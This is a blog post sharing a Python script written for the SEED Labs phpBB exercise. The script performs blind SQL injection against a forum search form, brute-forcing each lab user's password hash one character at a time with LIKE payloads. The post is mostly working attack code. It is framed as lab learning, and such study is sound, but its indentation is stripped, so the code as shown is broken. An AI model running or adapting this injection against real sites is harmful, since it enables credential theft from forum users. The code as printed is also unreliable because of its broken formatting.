Sunday, April 20, 2014

SQL Injection Script written for SEED Labs

SEED Labs are located here: http://www.cis.syr.edu/~wedu/seed/
These are great labs to learn more about cyber security and penetration testing.

The below script was developed to demonstrate SQL Injection on the phpBB lab that they provide.  Though the lab itself does not require this it was a great script to write.  With the script I extract the passwords for the 5 users that are found on the system.

This script could be made more efficient with instead brute forcing each letter to making them conditional statements.

#!/usr/bin/env python

 import os
import re
from socket import *
from time import ctime

 BUFSIZE=1024

 # Change the hostInput based on your IP Address of the SEED Installation of Ubuntu 9.
hostInput = '172.16.108.140'

 userNames = ['admin', 'alice', 'bob', 'carol', 'ted'] 
#userNames = ['ted'] 

 userPassword = ''
contentLength = 63

 for userName in userNames:
for number in range(1,30):
contentLengthTotal = contentLength + number

 for letter in 'abcdefghijklmnopqrstuvwxyz0123456789':
tcpServerSocket = socket(AF_INET, SOCK_STREAM)
remoteServer = (hostInput, 80)
tcpServerSocket.connect(remoteServer)

 searchRequest1 = "POST http://www.sqllabmysqlphpbb.com/search.php?mode=searchuser HTTP/1.1\n"
searchRequest2 = "Host: www.sqllabmysqlphpbb.com\n"
searchRequest3 = "User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0 Iceweasel/18.0.1\n"
searchRequest5 = "Accept-Language: en-US,en;q=0.5\n"
searchRequest6 = "Content-Type: application/x-www-form-urlencoded\n"
searchRequest7 = "Content-Length: " + str(contentLengthTotal) + "\n\n"
searchRequest8 = "search_username=4%27+OR+user_password+LIKE+%27" + userPassword + letter + "%25&search=Search\n\n\n"

 searchRequest = searchRequest1 + searchRequest2 + searchRequest3 + searchRequest5 + searchRequest6 + searchRequest7 + searchRequest8

 #print searchRequest

 tcpServerSocket.send(searchRequest)
f = open('/tmp/output', 'w')
initialLength = 0

while True:
pageReturned = tcpServerSocket.recv(BUFSIZE)
if not pageReturned:
break
#print pageReturned
initialLength = initialLength + 1
f.write(pageReturned)
if initialLength == 14:  
break

 f.closed
tcpServerSocket.close()

 f = open('/tmp/output', 'r')
userNameInFile = '<option value="' + userName + '">'
for line in f:
if userNameInFile in line:
userPassword = userPassword + letter 
f.closed

print "The hash stored as the password for " + userName + " is " + userPassword
userPassword = ''
contentLength = 63



at
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)

Test Authentication from Linux Console using python3 pexpect

Working with the IT420 lab, you will discover that we need to discover a vulnerable user account.  The following python3 script uses the pex...